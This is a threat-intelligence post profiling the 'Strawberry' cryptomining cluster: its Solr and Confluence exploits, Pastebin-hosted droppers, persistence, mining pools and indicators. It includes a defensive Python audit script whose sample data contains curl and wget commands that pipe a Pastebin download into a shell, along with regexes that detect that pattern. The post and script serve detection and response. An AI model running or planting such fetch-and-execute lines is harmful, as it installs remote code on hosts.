The next flavor from the Alert Logic data set in the activity clustering series is Strawberry.
Before diving into this activity cluster, be sure to read the series introduction here.
Tactics, Techniques and Procedures
Strawberry has been seen to favor two primary exploits for gaining entry onto a vulnerable machine. We have observed the flavor exploiting the Apache Solr remote code execution (RCE) vulnerability (CVE-2019-17558) and a Confluence OGNL exploit (CVE-2021-26084).
Strawberry was late to the game with the 2019 Apache Solr RCE, or did not initially target Alert Logic customers, as we did not observe the flavor during our initial threat hunts as part of our emerging threat process. They still saw some success with the vulnerability, perhaps because Apache themselves were slow to release a fix, or, more likely, because of the sad truth that many organizations are not able to patch their vulnerable systems quickly or frequently enough.
In 2021 it was a different story: the flavor was on our radar from the start, as they mounted a campaign targeting vulnerable Confluence servers while the vulnerability was still emerging, and so the group had more success in exploiting machines before mitigations could be put in place. Fortunately, Alert Logic’s threat intelligence team had earmarked Java OGNL as an inherently vulnerable language in which we anticipated future zero-day vulnerabilities or derivatives being discovered. This foresight meant we already had forward-looking wideband telemetry signatures in place that our threat hunters reviewed periodically, which in turn gave us early warning of this new exploit and let us detect it and facilitate earlier responses for affected customers.
Both RCE exploits enabled Strawberry to instruct the victim machine to reach out and download malicious files and scripts to begin the installation phase. The malicious files that were pulled to infected hosts during installation were hosted on pastebin[.]com, which is a website that allows users to share plain text files through public posts called ‘pastes.’ The site is very popular, with 17 million monthly users, commonly looking to share legitimate code. Pastebin is often abused by threat actors as it is a free resource where you can easily and anonymously host code, making it a simple location to house malicious code.
Of course, as a legitimate website, Pastebin frequently takes down pastes that do not adhere to its code of conduct. The Strawberry group was therefore forced to rotate through a variety of files as the Pastebin admins identified and removed the malicious content.
Once the dropper is pulled from Pastebin, double persistence is established by creating a new service (typically named javae[.]service) and setting up a new cron job (Linux equivalent of scheduled task).
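As an added illustration, not code from the Alert Logic post, here is a small Python audit that checks systemd unit definitions and crontab entries for the persistence pattern just described: a service named javae.service, and Exec or cron commands that fetch from pastebin.com and pipe the result straight into a shell. The unit and crontab contents are constructed samples; the unit name is the only indicator taken from the post.

```python
import re

# Constructed samples (not taken from the post); they mimic the described pattern of
# a systemd unit named javae.service and a cron entry that re-fetches a dropper from pastebin.
SAMPLE_UNITS = {
    "javae.service": "[Unit]\nDescription=javae\n[Service]\nExecStart=/bin/sh -c 'curl -fsSL https://pastebin.com/raw/EXAMPLE | sh'\nRestart=always\n[Install]\nWantedBy=multi-user.target\n",
    "sshd.service": "[Unit]\nDescription=OpenSSH server\n[Service]\nExecStart=/usr/sbin/sshd -D\n[Install]\nWantedBy=multi-user.target\n",
}
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * wget -q -O- https://pastebin.com/raw/EXAMPLE | sh
"""

FETCH_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")  # download piped into a shell
PASTE_HOST = re.compile(r"pastebin\.com", re.IGNORECASE)          # dropper hosting seen in this cluster
KNOWN_UNIT_NAMES = {"javae.service"}                              # service name reported in the post

def command_reasons(cmd):
    """Return human-readable reasons a command string looks like the dropper fetch, or []."""
    reasons = []
    if PASTE_HOST.search(cmd):
        reasons.append("fetches from pastebin.com")
    if FETCH_TO_SHELL.search(cmd):
        reasons.append("pipes a download straight into a shell")
    return reasons

def audit_unit(name, unit_text):
    """Flag a systemd unit by its name and by every Exec* directive it runs."""
    reasons = ["unit name matches reported indicator"] if name in KNOWN_UNIT_NAMES else []
    for line in unit_text.splitlines():
        if line.startswith("Exec") and "=" in line:
            reasons += command_reasons(line.split("=", 1)[1])
    return reasons

def audit_crontab(crontab_text):
    """Return (line, reasons) for each cron entry whose command part is suspicious."""
    hits = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue  # blank lines and comments carry no command
        fields = line.split()
        # '@reboot'-style entries have one schedule field, normal entries have five
        command = " ".join(fields[1:] if fields[0].startswith("@") else fields[5:])
        reasons = command_reasons(command)
        if reasons:
            hits.append((line, reasons))
    return hits
```

On a live host, feed audit_unit the files under /etc/systemd/system and audit_crontab the output of crontab -l for each user plus /etc/cron.d entries.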
Strawberry proceeds to pull down crypto-miner related files, hijacking the victim’s resources to create a steady monetary output for the flavor… if undetected.
Interestingly, the mining configurations differ between victims, although the method of setup remains consistent. Our working hypothesis is that Strawberry is more concerned with its financial outcomes being attributed to malicious activity than with its malicious activities being identified.
They have demonstrated the ability to change the superficial, simpler indicators of campaigns, such as attacker infrastructure, but not the areas that are more sophisticated, like the tactics, techniques and procedures (TTPs) used once they gain initial access.
Generally, Strawberry makes use of public cloud infrastructure, namely AWS and specifically the South Korean AWS region, during the recon-to-exploit phases. By using public cloud infrastructure, Strawberry can quickly generate and burn machines and IP addresses to circumvent any blocklists they may have been added to during active reconnaissance. In the latter stages, they move away from AWS but still use IPs consistent with South Korea, with a rogue Google address being the exception.
It is important to emphasize that the geographical location of the infrastructure used by the attacker does not amount to attribution. While this information is helpful in identifying the flavor’s actions, the Korean infrastructure preference does not equate to Korean actors.
The Pastebin file and crypto-miner configuration changes are the greatest variations seen in Strawberry’s actions. Otherwise, Strawberry’s modus operandi varies little when compared to other documented flavors.
A good comparison can be made with Mint, who also seek vulnerable Linux servers regardless of sector or organization. However, Mint regularly revisits their tactics, making changes to naming conventions and subtle, superficial changes to code in an attempt to evade detection and prevention controls. In contrast, our threat hunters view Strawberry as a fairly basic flavor with more static indicators.
Our readers may have noticed other similarities between Mint and Strawberry, including similarities in the kill chain sequence leading to the same outcome, crypto mining. At a glance, it’s fair to believe that these flavors could be combined and classified together; however, the subtleties in how we detect Mint vs. Strawberry are significant, such as the combination of differences found in both infrastructure and capabilities. Ultimately, the activity clusters are distinct, making it very likely they are not the same actor or group.
By separating out the two flavors, we are better equipped to identify compromise earlier, know exactly what/where to look next, and ultimately provide a comprehensive and thorough remediation plan for our customers. The documented intelligence of the Strawberry activity cluster allows us to holistically respond to a compromise, by extrapolating likely next steps from our established understanding.
Known Exploits Used
- CVE-2021-26084 [exp]
- CVE-2019-17558 [exp]
Techniques (MITRE ATT&CK)
- Active Scanning – T1595 [recon]
- Exploit Public-Facing Application – T1190 [recon/delivery/exploit]
- Scheduled Task/Job: Cron – T1053.003 [inst persistence]
- Create or Modify System Process – T1543 (service creation) [inst persistence]
- Ingress Tool Transfer – T1105 [inst / C2]
- Application Layer Protocol – T1071 [C2]
- XMRIG crypto mining [AoO]
- Resource Hijacking – T1496 [AoO]
Targets
- Vulnerable Linux servers
Infrastructure
- AWS – South Korean region [recon, deliv, exp]
- pastebin[.]com [inst]
- South Korean IPs (not attribution)
- Google LLC [inst]
- geo[.]c3pool[.]com [AoO]
- mine[.]c3pool[.]com [AoO]
- Ioflood [AoO]
- Hetzner Online GmbH [AoO]
- OVH SAS [AoO]
- EONIX-COMMUNICATIONS-ASBLOCK-62904 [AoO]
- pool[.]supportxmr[.]com [AoO]
Actions on Objectives
- Crypto mining (XMRIG)